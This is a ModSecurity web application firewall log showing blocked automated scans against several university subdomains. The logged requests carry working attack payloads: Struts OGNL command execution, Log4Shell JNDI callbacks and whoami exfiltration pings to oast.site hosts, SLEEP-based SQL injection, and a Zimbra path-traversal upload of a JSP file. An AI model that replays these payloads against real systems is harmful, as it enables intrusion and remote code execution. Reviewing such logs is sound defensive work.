[Tue Aug 29 11:34:04.350593 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "www.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11PMCo-f0AAAST4-YAAAAZ"]
[Tue Aug 29 11:34:04.378997 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgkwxtwuku633qb.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11PMCo-f0AAAST4-cAAAAZ"]
[Tue Aug 29 11:34:04.392212 2023] [:error] [pid 1169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlghf4ojzudn8mhp.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAASRn-4AAAAW"]
[Tue Aug 29 11:34:04.399382 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlgrat6t5pgeongx.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAASNzocAAAAQ"]
[Tue Aug 29 11:34:05.325725 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11PcCo-f0AAASUX0IAAAAd"]
[Tue Aug 29 11:34:06.390697 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAAQKOr8AAAAs"]
[Tue Aug 29 11:34:06.419299 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAASLqCcAAAAM"]
[Tue Aug 29 11:34:06.423855 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAASNzosAAAAQ"]
[Tue Aug 29 11:34:06.424210 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAASVoHIAAAAe"]
[Tue Aug 29 11:34:06.432538 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAAR@KLMAAAAF"]
[Tue Aug 29 11:34:07.303234 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAAR@KLQAAAAF"]
[Tue Aug 29 11:34:07.303423 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAARjjVIAAAAL"]
[Tue Aug 29 11:34:07.307838 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAASHh5sAAAAD"]
[Tue Aug 29 11:34:07.309074 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11P8Co-f0AAASS79sAAAAY"]
[Tue Aug 29 11:34:07.309591 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAASUX0UAAAAd"]
[Tue Aug 29 11:34:07.315337 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAASMgfkAAAAO"]
[Tue Aug 29 11:34:07.321507 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAAST4-4AAAAZ"]
[Tue Aug 29 11:34:07.321639 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAASGMscAAAAA"]
[Tue Aug 29 11:34:07.324285 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAAPDoMUAAAAP"]
[Tue Aug 29 11:34:07.328410 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAASfNuIAAAAg"]
[Tue Aug 29 11:34:07.332981 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAASAHgEAAAAH"]
[Tue Aug 29 11:34:08.317169 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAAQKOsIAAAAs"]
[Tue Aug 29 11:34:08.322995 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASfNuMAAAAg"]
[Tue Aug 29 11:34:08.327191 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASI0AYAAAAG"]
[Tue Aug 29 11:34:08.336573 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAR@KLYAAAAF"]
[Tue Aug 29 11:34:08.336865 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAARtAEsAAAAV"]
[Tue Aug 29 11:34:08.342852 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] 